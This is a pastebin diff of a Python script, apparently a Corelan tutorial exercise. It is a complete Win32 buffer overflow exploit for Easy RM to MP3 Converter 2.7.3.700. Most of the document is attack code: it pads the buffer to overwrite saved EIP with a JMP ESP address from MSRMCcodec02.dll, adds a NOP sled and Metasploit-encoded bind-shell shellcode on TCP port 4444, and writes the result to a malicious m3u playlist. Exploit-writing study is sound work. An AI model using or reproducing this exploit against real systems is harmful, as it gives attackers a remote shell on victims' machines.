View difference between Paste ID: 2NgJb33H and
SHOW:
|
|
- or go back to the newest paste.
1 | - | |
1 | + | #!/usr/bin/python |
2 | ||
3 | # need the struct-libs for little-endian packing | |
4 | import struct | |
5 | ||
6 | # some fancy ascii-stuff (as adviced in corelans tutorial ;P) | |
7 | print """ ______ ____ | |
8 | / /__ ___ ____ / /___ | |
9 | __ ____/ // / _\______\_ \ / // /_ | |
10 | __\ \\ .____// \_____ / \/ // // | |
11 | o/ 0\____ \/ \ / \__ /\ /0 /o | |
12 | _//__//_______/____Y_____\ / /___/\ \\__\\_ | |
13 | <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>""" | |
14 | ||
15 | print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-" | |
16 | print "\n corelan tutorial part1 - smtx.2010" | |
17 | print " greets 2 back-track-community and CORELAN" | |
18 | ||
19 | # building the buffer 26059 bytes till eip (depends on the path where the m3u is stored) | |
20 | preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4) # pre buffer to reach saved EIP | |
21 | ||
22 | # overwrite saved EIP with a JMP-ESP | |
23 | # Address=01D0F23A | |
24 | # Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll) | |
25 | eip = struct.pack('<i', 0x1D0F23A) # eip | |
26 | ||
27 | # this is to stuff another 4 bytes because of the "calling"-conventions mentioned | |
28 | # here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1 | |
29 | # and there -> http://en.wikipedia.org/wiki/X86_calling_conventions | |
30 | # there are 4 bytes between ESP and our shellcode so we need this to make | |
31 | # ESP pointing onto your shellcode | |
32 | pad = 'FUCK' | |
33 | ||
34 | # i make a little nopsled just to be sure of "weird" stuff to happen | |
35 | nopsled = '\x90' * 10 | |
36 | ||
37 | # BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR | |
38 | # size for shellcode is 3937 (not tested) at least enough for what we want | |
39 | # testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a' | |
40 | # this is a bind-shell-code listening on TCP-Port:4444 | |
41 | # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a' | |
42 | shcode = ( | |
43 | "\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1" | |
44 | "\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2" | |
45 | "\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e" | |
46 | "\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f" | |
47 | "\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1" | |
48 | "\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71" | |
49 | "\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81" | |
50 | "\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed" | |
51 | "\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f" | |
52 | "\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a" | |
53 | "\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd" | |
54 | "\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18" | |
55 | "\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3" | |
56 | "\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6" | |
57 | "\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a" | |
58 | "\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12" | |
59 | "\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34" | |
60 | "\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c" | |
61 | "\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c" | |
62 | "\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e" | |
63 | "\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67" | |
64 | "\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79" | |
65 | "\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd" | |
66 | "\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9" | |
67 | "\x47\x57\x93\xbf\x67\xc4\x94\x95\x62" | |
68 | ) | |
69 | ||
70 | trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) ) | |
71 | ||
72 | # lets put the attack-buffer together | |
73 | buffer = (preeip + eip + pad + nopsled + shcode + trigger) | |
74 | ||
75 | # open and write evil buffer into m3u-playlist | |
76 | print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist" | |
77 | f = open('pwn_easyRM.m3u', 'w') | |
78 | f.write(buffer) | |
79 | f.close() | |
80 | print " [x] done\n" | |
81 | ||
82 | # eof |